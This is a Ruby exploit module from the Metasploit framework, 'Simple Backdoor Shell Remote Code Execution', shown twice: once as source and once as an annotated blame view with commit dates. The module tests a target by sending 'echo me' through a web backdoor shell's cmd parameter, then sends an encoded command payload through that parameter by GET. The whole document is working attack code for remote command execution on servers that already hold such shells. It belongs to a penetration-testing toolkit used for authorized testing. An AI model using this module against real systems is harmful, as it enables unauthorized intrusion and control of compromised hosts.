metasploit-framework/modules/exploits/multi/http/simple_backdoors_exec.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Simple Backdoor Shell Remote Code Execution',
      'Description'    => %q{
          This module exploits unauthenticated simple web backdoor shells by leveraging the
        common backdoor shells' CMD parameter  to execute commands. The SecLists project of
        Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells
        which are categorized under Payloads.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jay Turla <@shipcod3>',
        ],
      'References'     =>
        [
          [ 'URL', 'http://resources.infosecinstitute.com/checking-out-backdoor-shells/' ],
          [ 'URL', 'https://github.com/danielmiessler/SecLists/tree/master/Payloads' ] # Most PHP Web Backdoors Listed
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 2000,
          'BadChars' => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['backdoor / Unix', { 'Platform' => 'unix' } ],
          ['backdoor / Windows', { 'Platform' => 'win' } ]
        ],
      'DisclosureDate' => 'Sep 08 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The path of a backdoor shell", "/cmd.php"]),
      ],self.class)
  end

  def check
    test = "echo me"
    request_parameters = {
      'method'	=> 'POST',
      'uri'		=> normalize_uri(target_uri.path.to_s),
      'vars_post'	=>
        {
          'cmd' => test
        }
    }
    shell = send_request_cgi(request_parameters)
    if (shell and shell.body =~ /echo me/)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def http_send_command(cmd)
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path.to_s),
      'vars_get' => {
        'cmd' => cmd
      }
    })
    if not (res and res.code == 200)
      fail_with(Failure::Unknown, 'Failed to execute the command.')
    end
  end

  def exploit
    http_send_command(payload.encoded)
  end
end
Simple Backdoor Shell Remote Code Execution 2015-09-08 05:08:47 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => 'Simple Backdoor Shell Remote Code Execution',`
			`'Description' => %q{`
			`This module exploits unauthenticated simple web backdoor shells by leveraging the`
Update simple_backdoors_exec.rb Updated the description 2015-09-08 05:42:12 +00:00			`common backdoor shells' CMD parameter to execute commands. The SecLists project of`
			`Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells`
			`which are categorized under Payloads.`
Simple Backdoor Shell Remote Code Execution 2015-09-08 05:08:47 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Jay Turla <@shipcod3>',`
			`],`
			`'References' =>`
			`[`
			`[ 'URL', 'http://resources.infosecinstitute.com/checking-out-backdoor-shells/' ],`
			`[ 'URL', 'https://github.com/danielmiessler/SecLists/tree/master/Payloads' ] # Most PHP Web Backdoors Listed`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 2000,`
			`'BadChars' => '',`
			`'DisableNops' => true,`
			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd'`
			`}`
			`},`
			`'Platform' => %w{ unix win },`
			`'Arch' => ARCH_CMD,`
			`'Targets' =>`
			`[`
			`['backdoor / Unix', { 'Platform' => 'unix' } ],`
			`['backdoor / Windows', { 'Platform' => 'win' } ]`
			`],`
			`'DisclosureDate' => 'Sep 08 2015',`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`OptString.new('TARGETURI', [true, "The path of a backdoor shell", "/cmd.php"]),`
			`],self.class)`
			`end`

			`def check`
			`test = "echo me"`
			`request_parameters = {`
			`'method' => 'POST',`
			`'uri' => normalize_uri(target_uri.path.to_s),`
			`'vars_post' =>`
			`{`
			`'cmd' => test`
			`}`
			`}`
			`shell = send_request_cgi(request_parameters)`
			`if (shell and shell.body =~ /echo me/)`
			`return Exploit::CheckCode::Vulnerable`
			`end`
			`return Exploit::CheckCode::Safe`
			`end`

			`def http_send_command(cmd)`
			`res = send_request_cgi({`
			`'method' => 'GET',`
			`'uri' => normalize_uri(target_uri.path.to_s),`
			`'vars_get' => {`
			`'cmd' => cmd`
			`}`
			`})`
			`if not (res and res.code == 200)`
			`fail_with(Failure::Unknown, 'Failed to execute the command.')`
			`end`
			`end`

			`def exploit`
			`http_send_command(payload.encoded)`
			`end`
			`end`